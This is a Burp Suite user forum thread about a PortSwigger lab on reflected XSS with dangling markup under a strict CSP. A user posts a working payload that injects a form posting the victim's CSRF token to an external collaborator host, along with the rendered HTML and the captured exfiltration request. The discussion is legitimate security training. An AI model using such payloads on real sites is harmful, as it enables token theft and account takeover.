Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Issue with "Reflected XSS protected by very strict CSP, with dangling markup attack" Lab

Prajyot | Last updated: Dec 27, 2023 10:53AM UTC

I understand that the current solution for this lab is broken because of Chrome's recent updates. I believe that I may have found an alternative solution, since I get an interaction with the CSRF token in the request body on my collaborator when I try it on myself. However it doesn't seem to work when I deliver it to the victim. Here's my payload for reference: ``` <script> location = 'https://0a49005803315b4185f35e92000600e2.web-security-academy.net/my-account?email=%22%3E%3C/form%3E%3Cform%20action=%22https://fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com%22%20id=%22x%22%20method=%22POST%22%3E%3Cinput%20type=%22submit%22%20value=%22Click%20Me%22%3E%3Cinput%20type=%22hidden%22%20name=%22data%22%20value=%27'; </script> ``` Here's how my payload renders when the page loads: ``` <form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST"> <label>Email</label> <input required="" type="email" name="email" value=""> </form> <form action="https://fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com" id="x" method="POST"><input type="submit" value="click me"> <input type="hidden" name="data" value="&quot;> <input required type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;i0czssDyg8WAQ1WQkQXc3s7doqUg0Gtw&quot;> <button class=" button'=""> Update email </form> ``` And the interaction I get on collaborator: ``` POST / HTTP/1.1 Host: fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com Connection: keep-alive Content-Length: 202 Cache-Control: max-age=0 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://0a49005803315b4185f35e92000600e2.web-security-academy.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://0a49005803315b4185f35e92000600e2.web-security-academy.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 data=%22%3E%0D%0A++++++++++++++++++++++++++++%3Cinput+required+type%3D%22hidden%22+name%3D%22csrf%22+value%3D%22akQtuN2ZLE9IJAoKsrnsO2gAw3MVPBRR%22%3E%0D%0A++++++++++++++++++++++++++++%3Cbutton+class%3D ```

Dominyque, PortSwigger Agent | Last updated: Dec 27, 2023 01:03PM UTC

Hi The lab should solve with the given solution. If you are experiencing issues with the lab, can you please send a screen recording of your attempt to support@portswigger.net?

Prajyot | Last updated: Dec 28, 2023 05:20AM UTC

Is the victim user configured to search and click on anchor tags only?

Dominyque, PortSwigger Agent | Last updated: Dec 28, 2023 07:30AM UTC

Hi Prajyot It is beyond the scope of technical support to provide guidance outside of using the given solution.

Prajyot | Last updated: Dec 28, 2023 07:59AM UTC

well its solved now :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.